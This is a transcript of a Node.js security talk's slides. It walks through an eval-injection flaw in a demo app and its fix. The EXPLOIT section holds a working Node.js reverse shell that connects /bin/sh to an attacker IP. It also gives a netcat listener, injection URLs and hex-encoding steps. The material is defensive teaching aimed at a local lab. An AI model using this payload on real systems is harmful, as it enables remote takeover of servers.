NODE JS SECURITY VULNERABILITIES
ABOUT ME
Madhu Akula - Automation Security Ninja at Appsecco
Interested in Security & DevOps
Never ending learner!
@madhuakula
WHAT IS NODE JS?
Node.js is an open-source, cross-platform
runtime environment for developing server-
side Web applications.
Although Node.js is not a JavaScript
framework, many of its basic modules are
written in JavaScript, and developers can
write new modules in JavaScript. The
runtime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia
HELLO WORLD HTTP SERVER IN NODE JS
var http = require('http'); 
var server = http.createServer(function(req, res) { 
res.writeHead(200); 
res.end('Hello World'); 
}); 
server.listen(2000); 
WHY NODE JS SECURITY?
A lot of applications are moving to JavaScript, especially
with the MEAN (Mongo-Express-Angular-Node) stack.
HOW TO TEST NODE JS SECURITY?
It is similar to normal web application security testing, with
additional checks for JavaScript-specific vulnerabilities such as
user input reaching eval.
DEMO TIME
REVERSE SHELL ON A NODE.JS APPLICATION BY @WIREMASK
POC SETUP
VULNERABLE NODE JS CODE
'use strict' 
const http = require('http'); 
const url = require('url'); 
const path = require('path'); 
const animalsJSON = path.join(__dirname, 'animals.json'); 
const animals = require(animalsJSON); 
function requestHandler(req, res) { 
let urlParams = url.parse(req.url, true); 
let queryData = urlParams.query; 
res.writeHead(200, {"Content-Type": "application/json"}); 
ACCESS THE APPLICATION
http://localhost:3000/?name=do* 
IDENTIFICATION
The stringToRegexp function passes user input to eval to
build a RegExp object, which it then uses to find elements in an
array.
return eval(prefix + output + suffix); // we control output value 
We can insert our own JavaScript code into the output
variable and have it executed. The stringToRegexp function
escapes some characters, and the resulting output value is
then evaluated.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"] 
EXPLOIT
(function(){ 
    var net = require("net"), 
        cp = require("child_process"), 
        sh = cp.spawn("/bin/sh", []);   // shell whose stdio gets wired to the socket 
    var client = new net.Socket(); 
    client.connect(8080, "172.28.128.1", function(){   // attacker host and netcat port 
        client.pipe(sh.stdin);    // bytes from the listener become shell input 
        sh.stdout.pipe(client);   // shell output goes back to the listener 
        sh.stderr.pipe(client); 
    }); 
    return /a/;   // hand a RegExp back so the evaluating code keeps running 
})(); 
START NETCAT LISTENER
nc -lvp 8080 
SAMPLE URL
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString(
HEX PAYLOAD CREATION USING PYTHON
>>> payload = 'nodejs reverse shell JavaScript code' 
>>> payload.encode('hex') 
(Python 2 shown; in Python 3 the equivalent is payload.encode().hex().)
FINAL URL WITH PAYLOAD
http://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20
CHECK YOUR NETCAT LISTENER
CONCLUSION
It is highly recommended to avoid the eval
function in a JavaScript project. The fix was
rather simple: the developers started using
the RegExp object directly, so the user-supplied
pattern is handled as data rather than as code.
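Worked example added here (not code from the slides or from @wiremask's demo application): a reconstruction of the eval-based stringToRegexp pattern described under IDENTIFICATION, the hex-encoding step from HEX PAYLOAD CREATION done in Node instead of Python 2, and the RegExp-based fix from the CONCLUSION, side by side. The animal list, the sink flag that stands in for a spawned shell, the exact escaping rules of the vulnerable function and the helper names (stringToRegexpVulnerable, stringToRegexpSafe, findAnimals, toHex, directPayload, hexPayload) are all assumptions, not the original app's code.

```javascript
'use strict';
// Added illustration, not the original demo app's code. Assumptions: the app
// turns a glob such as "do*" into /^do.*$/ by string-building, and the
// vulnerable version escapes only "?" and "+" (the slides say it "escapes some
// characters" without listing them).

const animals = ['dog', 'dolphin', 'cat'];   // constructed stand-in for animals.json
const sink = { owned: false };               // flag a payload flips instead of spawning a shell

// VULNERABLE: regex source is built as a string and handed to eval().
// The caller controls `output`, so anything after a closing "/" runs as JavaScript.
function stringToRegexpVulnerable(glob) {
  const prefix = '/^';
  const suffix = '$/';
  const output = glob.replace(/[?+]/g, '\\$&').replace(/\*/g, '.*');
  return eval(prefix + output + suffix);   // we control the output value
}

// FIXED: every regex metacharacter is escaped and the pattern is passed to the
// RegExp constructor as data. "*" is the only character that keeps a special meaning.
// The worst a hostile pattern can now do is make the constructor throw a SyntaxError.
function stringToRegexpSafe(glob) {
  const output = glob
    .replace(/[.+?^${}()|[\]\\\/]/g, '\\$&')
    .replace(/\*/g, '.*');
  return new RegExp('^' + output + '$');
}

// The lookup both versions of the app would perform on ?name=<glob>.
function findAnimals(glob, toRegexp) {
  const re = toRegexp(glob);
  return animals.filter((a) => re.test(a));
}

// Hex-encode a JavaScript payload so it contains only [0-9a-f]: nothing for the
// escaping step or the URL to mangle. Buffer.from replaces the deprecated
// new Buffer() constructor used on the slide.
function toHex(js) { return Buffer.from(js, 'utf8').toString('hex'); }
function fromHex(hex) { return Buffer.from(hex, 'hex').toString('utf8'); }

// Close the regex literal, run `js`, and return a RegExp so the app keeps working
// (first-stage payload in the shape of the slide's require('util').log('Owned') URL).
function directPayload(js) { return `./;(function(){${js};return /a/;})();//*`; }

// Same break-out, but the code itself travels hex-encoded and is decoded in place.
function hexPayload(js) {
  const hex = toHex(`(function(){${js};return /a/;})()`);
  return `./;eval(Buffer.from('${hex}','hex').toString());//*`;
}

// Run one payload through one implementation and report whether code executed.
function attempt(glob, toRegexp) {
  sink.owned = false;
  const matched = findAnimals(glob, toRegexp);
  return { matched, executed: sink.owned };
}
```

Calling attempt(hexPayload('sink.owned=true'), stringToRegexpVulnerable) returns executed: true (and matches ['cat'], because the payload returns /a/), while the same payload against stringToRegexpSafe returns executed: false and matches nothing: the pattern is just a long literal.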
WANT TO TRY IT YOURSELF?
https://github.com/appsecco/vulnerable-apps
docker run -p 3000:3000 -d appsecco/node-reverse-shell 
PLAYGROUND FOR NODEJS VULNERABILITIES
DAMN VULNERABLE NODE APPLICATION
Ansible Playbook & Docker
NODE JS SECURITY REFERENCES
https://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/
https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec
THANK YOU
Q&A
@MADHUAKULA
